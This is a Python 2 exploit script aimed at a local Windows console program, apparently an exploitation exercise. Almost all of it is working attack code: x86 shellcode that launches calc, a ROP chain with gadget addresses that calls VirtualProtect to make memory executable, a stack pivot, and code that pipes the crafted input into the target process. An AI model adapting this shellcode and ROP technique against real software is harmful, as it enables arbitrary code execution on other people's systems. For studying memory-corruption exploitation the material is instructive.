import struct
import random, string
from os import popen4

def randomword(length):
    return ''.join(random.choice(string.letters) for i in range(length))


shellcode="\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff" \
"\x66\x31\xDB\x64\x8B\x73\x08\x81\xC6\x00\x02\x00\x00\x8B\xE6"+"\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7" + "\x6A\xFF\xFF\x15\xA4\xD2\xCD\x61"



stdin,stdout = popen4(r"C:\Users\ricnar\Desktop\GUS\ConsoleApplication2.exe")
raw_input()
print stdin


rop1 = [
    0x6601e02c, # address for jump to pivoting in  offset 000006F8   CALL DWORD PTR DS:[EDX+4] ConsoleApplication2.exe
    0x61CD3FFB, # MOV EAX,EBX # POP EBX # RET
    0x6601E030,
    0x61CD439A, # gadget to memcpy our shellcode to 0x6601E040
    0x6601E040, # destination of thne memcpy
    0x500,
    0x800,      # size to copy
]

rop2 = [
    0x6601E0F8, # jump to executable shellcode in the final
]

rop3 = [
    0x11,
    0x22,
    0x33,
    0x6601E0A4,
    0x61CD4FB7, #POP EAX # POP ECX # RET
    0x660ef1a0, # VirtualProtect IAT
    0x10,
    0x61CD5705, # MOV EAX,DWORD PTR DS:[EAX] # RET   VirtualProtect Address to EAX
    0x61CD32D4, # CALL EAX to call VirtualProtect
    0x6601E040, # address to unprotect give execution
    0x1,        # size
    0x40,       # executable
    0x6601E038,
    0x41414141,
    0x6601E1F0,
]

rop_pivot2= rop1+ (24 * rop2) + rop3

rop = (struct.pack("<" + ("L" * len(rop_pivot2)), *rop_pivot2))

cadena = "a" * 30 +'\n' + "b" * 2 +'\n' + "420" + "\n" + "1711332255"+ "\n" + rop + shellcode + "\n"  # 1711332255 stack pivot 0x6600db9f XCHG EAX, EBP ... LEAVE # RET


print "Escribe: " + cadena
stdin.write(cadena)